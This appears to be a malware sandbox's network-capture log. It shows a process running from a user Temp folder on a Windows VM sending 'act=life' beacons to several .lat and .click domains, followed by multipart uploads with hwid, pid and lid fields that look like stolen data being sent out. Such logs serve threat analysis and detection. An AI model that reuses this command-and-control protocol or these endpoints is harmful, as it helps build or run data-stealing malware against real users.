2024-12-19 09:11:54 UTC	1378	IN	Data Raw: f1 78 84 3d 8c 25 5e d0 c4 01 d9 92 bb 7f bc 61 9a 73 82 68 6d f7 c4 36 2a 68 69 f9 9d fc 06 cd 2d 8e 9b 32 53 16 82 88 01 ee 97 fb 71 1d 50 af 95 ac 96 80 0b bb b2 76 df 70 11 73 bd 31 04 52 b6 bf 0e aa b1 b1 2c eb 54 2b 15 c6 45 a9 73 42 88 44 30 f1 3d 77 40 ce 07 c7 7f dc e9 98 8f 55 74 ca ca e5 17 e5 8e bf 5f 91 a4 3b ed d2 b8 50 05 f0 8a ac 75 80 ec 18 2a bc 87 b5 50 94 84 43 54 a1 65 f6 a2 34 b0 63 58 59 98 a8 d1 93 c3 c8 c1 87 9c 54 9b 46 dc 02 49 7a 1d 85 00 be d3 45 82 02 cc 71 e6 0c 91 2c d4 93 4a d3 54 9c ba 68 d8 48 74 f0 4c 08 98 03 7d 59 de 02 c1 1e d2 cf ca ad b0 7f 8f c3 dc bd c2 b9 93 9a ee 98 bc da ee 8c 05 61 d9 7e b7 ac ea bd f5 b2 ba 81 2a 96 5b d4 02 53 aa b5 e8 0e f5 31 a6 2d 26 36 c3 c3 2f 38 32 d9 46 34 4a da 7c a3 ad 41 7d 0e 29 Data Ascii: x=%^ashm6hi-2SqPvps1R,T+EsBD0=w@Ut_;PuPCTe4cXYTFIzEq,JThHtL}Ya~*[S1-&6/82F4J\|A})
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 7f 3c fb cf 9b ee e5 f5 61 04 ec 17 45 da 7a 22 fb 89 b1 6e a8 3c 39 03 48 4f a6 38 c9 32 32 a0 f3 de db f8 ac f9 60 db 2c de a3 b3 61 f0 7f db 6b 32 72 05 34 1b 2e da 3b fe 0a b0 3c 31 bf 0a 3e 0c 9d 8f be a0 b8 2d 8b e3 17 00 96 b5 14 c6 0b 31 e5 33 f3 e2 f4 b8 62 fc eb 87 6b bf 83 6a ea 82 2f 67 5c a0 3f dc 66 9b 8b 69 3b 42 0d 62 b6 06 8c 74 8d dc 29 30 7a 57 67 e2 38 c1 23 00 6e 42 48 ca da bb f5 c7 01 f4 19 03 69 65 6d e5 b0 ea ec 8e f1 7e 27 fe 5c ec 10 5a 69 9d 5c b5 ed 55 10 9a 3c df c4 3d fa 6e 15 73 ba 43 75 e8 cd 0b 2f 23 f3 26 c1 81 f4 6a 6c 33 fd b4 fc 44 9e 68 cb 8b b7 8b 38 f0 26 cc 60 6b 6c 13 a0 48 72 54 63 ff d0 69 80 78 e0 0a d8 62 bb 4d 5d 85 36 3c 9e 83 4f 77 56 60 6d a4 18 2c 70 5e 18 63 5c 10 2b a2 6c 51 4c 48 dc 09 7a 55 4f f1 08 Data Ascii: <aEz"n<9HO822`,ak2r4.;<1>-13bkj/g\?fi;Bbt)0zWg8#nBHiem~'\Zi\U<=nsCu/#&jl3Dh8&`klHrTcixbM]6<OwV`m,p^c\+lQLHzUO
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: cd 3a 89 7c 61 f9 ad e9 47 47 81 23 fc 3a 2f b5 f0 4d 0b 8b 29 d0 2b 7f 92 b1 2f ff 4c 92 2e ac dd 43 f6 04 93 d5 ff 41 01 3b 9a b7 74 94 f0 2d f7 6f fe c9 1a 4a e2 72 10 49 be 79 64 1e 59 98 c5 73 c1 2a d2 fa ae 9a 87 53 c6 22 fe 8d 75 6a ab 48 e1 0b c7 82 2f 89 a7 52 6e 2e fb 11 41 32 56 e6 f7 04 a9 c2 7e a9 73 03 b5 5e 4c b5 79 b8 36 79 89 d0 e1 a9 f6 25 00 ee 74 88 51 73 0e b8 8a 09 dd bc 9f 34 a0 74 5a 0c 14 42 ca 33 44 ed b5 46 6e e8 2b e7 68 75 d2 d0 6a 06 80 61 d9 4c 48 d3 75 e6 7b ea 03 9c 56 b3 9a a2 fe 7e 5d c7 98 7c ba a6 70 30 fc 93 de 65 4c 0d 22 8d ae 53 69 de 64 a8 93 ee 6e 80 34 db 95 7f e2 f3 f8 6e b6 ca 18 0f 9b bd 92 b3 88 92 2f a1 09 99 e0 be 9a da 67 4a 12 e3 a6 80 3e bc 60 ae d1 a3 80 48 74 82 1e 7c 29 e8 86 3a 66 74 63 bf 32 84 b6 Data Ascii: :\|aGG#:/M)+/L.CA;t-oJrIydYs*S"ujH/Rn.A2V~s^Ly6y%tQs4tZB3DFn+hujaLHu{V~]\|p0eL"Sidn4n/gJ>`Ht\|):ftc2
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 2e 34 d2 36 c0 1c 87 05 5c 19 ce a7 bd 39 4e 7d 8b 06 42 78 48 49 6f d7 9e dc 3a 51 28 cf d3 b8 60 bb 66 7f 15 75 62 46 09 a7 b7 e2 4e f9 4c ce 36 6b 96 d8 1c 3d 12 ab 4f fa 4a 93 46 1d e0 e5 da 7b 7e ea 20 1a 24 16 a4 57 46 00 78 d6 d2 52 42 48 61 fb 11 84 e4 88 38 35 08 87 fe d7 21 d2 15 3b b1 d6 32 14 35 9b f5 24 fd 97 82 12 89 fb c8 42 80 ab c0 fe 57 3f b0 f7 05 cf c8 4c 9d 0d 28 61 a6 4a ff df 92 66 f3 77 e4 f4 ab b8 1a cc e3 84 f3 c5 e8 a6 23 97 5e 97 2e 49 f7 87 b2 1c e7 c3 6d 90 57 d5 93 b3 a0 57 ea 3b 13 7f a6 ac 57 86 84 70 7a 33 ee a4 49 61 6c c4 db 59 bf 8b 5d d3 90 df 70 fd 12 fb 6f ef 9c ec 2b 51 d9 e7 01 c0 d1 e4 bd b0 75 e7 7c 94 e3 8c 0f 18 6c 6a 23 dc 80 94 92 65 ab fb 9e 3e e6 dd 0f dc 18 39 0c 3b 45 ff 79 45 9c 77 a8 ef 64 09 40 9f a1 Data Ascii: .46\9N}BxHIo:Q(`fubFNL6k=OJF{~ $WFxRBHa85!;25$BW?L(aJfw#^.ImWW;Wpz3IalY]po+Qu\|lj#e>9;EyEwd@
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 6f 27 c8 2d a7 9d ad 5b 54 d5 1a 44 4a cf 01 57 bf fa c7 40 0f 62 46 a9 78 3b 53 2e c9 60 34 8b 54 3e c2 aa 4c 64 e8 0f 4d 01 52 ca 2e b9 4a 41 71 e9 1a 17 8b 36 85 2b 37 1c b2 47 c3 92 79 78 44 aa e4 73 45 c3 7a ec a7 e8 f7 97 f9 e5 71 06 ae 79 53 00 5a b4 d4 63 52 3c 66 0d 2b ba 47 e1 89 5a ea fe 50 67 3d 24 e0 25 c3 bf 2c 06 02 81 ba 53 b7 8c e7 69 41 5d 67 e5 27 5f ec 50 ae ad 59 7c 47 c4 d3 9c 51 f8 c1 d4 af f7 51 63 69 25 2f 55 56 a6 7f 1d 5e 56 09 83 c4 2a 95 b4 0c d0 59 9a b3 d2 54 43 c2 53 ce ca 88 f2 ab 02 49 f5 6a 13 ba 37 af 1a e5 a9 c6 63 09 86 3a e5 69 a5 da 02 b7 22 96 08 04 32 f5 0f b5 82 78 1a 6a f8 99 d4 fd 19 e7 d9 d9 7c a0 8f df f7 83 e0 1f 60 60 97 60 39 64 30 6a d4 64 cd b7 ed b6 a7 f9 39 b4 fe 6f c4 7e 33 ca a7 36 25 c0 31 bf 78 3c Data Ascii: o'-[TDJW@bFx;S.`4T>LdMR.JAq6+7GyxDsEzqySZcR<f+GZPg=$%,SiA]g'_PY\|GQQci%/UV^V*YTCSIj7c:i"2xj\|```9d0jd9o~36%1x<
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: ba 49 69 e7 8f 7d d1 5f af da 49 9c 64 28 98 59 36 b3 a4 1d f8 cb 15 30 7b 25 96 6a 09 2c f9 20 89 72 a7 05 a6 ea 8d 9a 4d 6f 93 43 f8 1a 0b 86 c5 cd 49 b1 ae e6 66 89 2c 31 6d 66 65 ba b9 26 f7 bc e2 7e 04 08 8b 2a 14 e9 10 fd 4f e9 bc c6 a4 d3 a8 ff e7 d6 37 51 ca 11 be 2b c4 19 d5 58 47 e5 06 47 a6 80 1f cd 2c cd 1b 2f fe bf 7a e4 22 a8 58 99 b7 c2 f4 2a 61 f9 4b 1f 10 3a 80 ad c6 6c c2 ad 0a e8 42 64 3a 1d 96 d8 35 ce 0e d9 3d a7 34 55 40 23 4e ec 0a 67 8f e3 ae f1 06 2c 05 91 70 68 31 70 bc 85 3c c2 34 7e 0b 71 0b ef a9 16 2d 07 43 97 d6 3c d9 85 4d 50 fa be f0 ac b9 0b 8b 20 9b 22 09 1f cb 88 e8 11 b7 86 f0 e6 ed 30 8d 84 c5 b5 0c 33 84 45 94 ff 9e 5f 82 1d d6 2a c6 a7 07 43 f5 be f1 7d dc 32 9e 71 98 2a 5e aa e3 b3 e4 3c fe fd 1c ba 1b fe 1d c0 d9 Data Ascii: Ii}_Id(Y60{%j, rMoCIf,1mfe&~O7Q+XGG,/z"XaK:lBd:5=4U@#Ng,ph1p<4~q-C<MP "03E_C}2q^<
2024-12-19 09:11:54 UTC	1378	IN	Data Raw: 52 e0 1f 58 23 09 4b ac 81 56 f8 11 a3 e9 9a 43 0c 60 01 1d ac 7a b7 e5 2b f8 87 42 a7 8f 08 53 15 76 f7 ad 7b 62 db 9b f9 e8 88 8f 97 0a 19 31 58 c4 e7 2b 34 56 b1 00 87 dc 42 8f cf 0b 67 f8 38 50 45 9a 20 8e fa c9 f1 85 14 bc 23 26 13 67 95 23 3c fc 05 7b 68 9c 69 8d 73 5b fc c0 db 6e da 60 44 01 ed 8b 92 68 d9 2c 74 c3 17 41 9d 40 7d e1 6f c6 35 d8 97 5d ee 57 5b 90 e9 51 03 2c 68 50 87 88 56 9d 16 a8 1b ac 3f 66 16 fd ff b9 0c 32 82 96 49 d1 4a 63 f5 a8 47 9b 08 b8 45 61 aa 63 64 be c9 9a f2 0b dd 64 ef 60 ad 54 73 91 db b5 0f 39 94 2a 4d b1 f6 81 20 51 06 ac df e4 cd 78 af 96 19 fe 1a c8 4a 65 e8 79 5d cc c5 8d d9 1d f9 22 55 8a 86 da 2b f0 00 1c 49 5f d3 1c 62 bf 22 c3 33 ec d2 ad d3 ab 98 d2 42 8b 64 a6 41 08 fd 7f a6 3c da c3 89 a7 2e 33 dc 08 02 Data Ascii: RX#KVC`z+BSv{b1X+4VBg8PE #&g#<{his[n`Dh,tA@}o5]W[Q,hPV?f2IJcGEacdd`Ts9*M QxJey]"U+I_b"3BdA<.3

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.6	50140	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:54 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:11:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:12:06 UTC	1119	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4sagmo9g135tftpeadnpfturop; expires=Mon, 14 Apr 2025 02:58:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBsr49SSM8dH1nfWtIjXA9ygAnh69BBM054xzQIxnXrSbYCMAR2HSR8bsYF3bGCKhUYqbVH0tysxlViz5iBq9fJY8Q9%2FBiP%2BszZijHJqWIKFLTHnEw%2BKDGFpKLsVDrgq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644960fa4424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1632&rtt_var=695&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1789215&cwnd=208&unsent_bytes=0&cid=421d1ac2964ba56f&ts=12008&x=0"
2024-12-19 09:12:06 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:12:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50142	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:56 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NW1CRGLU1WEOSM4ZQU4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1302 Host: grannyejh.lat
2024-12-19 09:11:56 UTC	1302	OUT	Data Raw: 2d 2d 4e 57 31 43 52 47 4c 55 31 57 45 4f 53 4d 34 5a 51 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 57 31 43 52 47 4c 55 31 57 45 4f 53 4d 34 5a 51 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 57 31 43 52 47 4c 55 31 57 45 4f 53 4d 34 5a 51 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --NW1CRGLU1WEOSM4ZQU4Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--NW1CRGLU1WEOSM4ZQU4Content-Disposition: form-data; name="pid"1--NW1CRGLU1WEOSM4ZQU4Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-19 09:12:12 UTC	1124	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=adn2ic8itb0flacfc4ibsbdrbu; expires=Mon, 14 Apr 2025 02:58:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdhKc60LdkNW7m9ZhL2HpVji8cGzWv%2BJ9TyztjyDjhPVJzy9YLs5%2F%2Fus8Twcjelos37iLkzg6%2B8XAHFo4oSG4bXKEME9tVC47z4E6nUjwmNvwyn8Cui1QntN7eGI%2B45H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644a3ec7743ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2449&min_rtt=2449&rtt_var=919&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2217&delivery_rate=1191350&cwnd=237&unsent_bytes=0&cid=a0fc1ca552531255&ts=16372&x=0"
2024-12-19 09:12:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	50144	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:58 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: aspecteirs.lat
2024-12-19 09:11:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:12:12 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3gv8re8qls32bjlc0g03jegdd6; expires=Mon, 14 Apr 2025 02:58:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4QEM2pobrsurXj3WPKgGQQNLd8D3jgKoCG6jM1bZvihW8w2Z6gsI0z1DPk4KiiiMoKW6XNAduyjX8r599An9Q8Hp%2BVLcC4u5E%2F41aKy%2BPUANLF0lmNc3QL1ls4QfcVhDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644afbbb01a24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1801&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1547429&cwnd=217&unsent_bytes=0&cid=bff29572fc6573c0&ts=14318&x=0"
2024-12-19 09:12:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:12:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.6	50148	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:01 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2024-12-19 09:12:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:12:16 UTC	1139	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4ftviv7kppc6odeuig53pln9ut; expires=Mon, 14 Apr 2025 02:58:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rUmzQ%2BOudBYSEfDNwjsDS%2FlXylA%2F94V%2FVxRRFCym9PQERV6Piz2%2BatLIZ5Yx16%2FPrj1GnAdlLW%2FBRNIqG%2FiaADhOlw0FEjCPZvV7GbpUAGQkbFpeyrUGN6CTf3nST28kE%2BCL2Fw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4644c0dfb40f8b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1499&rtt_var=584&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1947965&cwnd=237&unsent_bytes=0&cid=ff749bf2c4cd10f1&ts=15751&x=0"
2024-12-19 09:12:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:12:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	50150	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:03 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 43 6a 68 33 56 47 31 46 55 2b 64 73 76 43 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 63 35 31 39 65 39 39 64 66 38 39 66 63 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 9Cjh3VG1FU+dsvC1.1Context: b5c519e99df89fcf
2024-12-19 09:12:03 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:12:03 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 43 6a 68 33 56 47 31 46 55 2b 64 73 76 43 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 63 35 31 39 65 39 39 64 66 38 39 66 63 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9Cjh3VG1FU+dsvC1.2Context: b5c519e99df89fcf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:12:03 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 39 43 6a 68 33 56 47 31 46 55 2b 64 73 76 43 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 35 63 35 31 39 65 39 39 64 66 38 39 66 63 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 9Cjh3VG1FU+dsvC1.3Context: b5c519e99df89fcf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 09:12:03 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:12:03 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 36 65 48 50 67 63 51 74 6a 45 61 34 36 4f 4e 61 42 65 51 51 39 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 6eHPgcQtjEa46ONaBeQQ9g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	50152	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:04 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J266A99CC0MMD32S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19946 Host: lossekniyyt.click
2024-12-19 09:12:04 UTC	15331	OUT	Data Raw: 2d 2d 4a 32 36 36 41 39 39 43 43 30 4d 4d 44 33 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 32 36 36 41 39 39 43 43 30 4d 4d 44 33 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 32 36 36 41 39 39 43 43 30 4d 4d 44 33 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 39 5a 31 63 79 63 2d 2d 0d 0a 2d 2d 4a 32 36 36 41 39 39 Data Ascii: --J266A99CC0MMD32SContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--J266A99CC0MMD32SContent-Disposition: form-data; name="pid"3--J266A99CC0MMD32SContent-Disposition: form-data; name="lid"9Z1cyc----J266A99
2024-12-19 09:12:04 UTC	4615	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 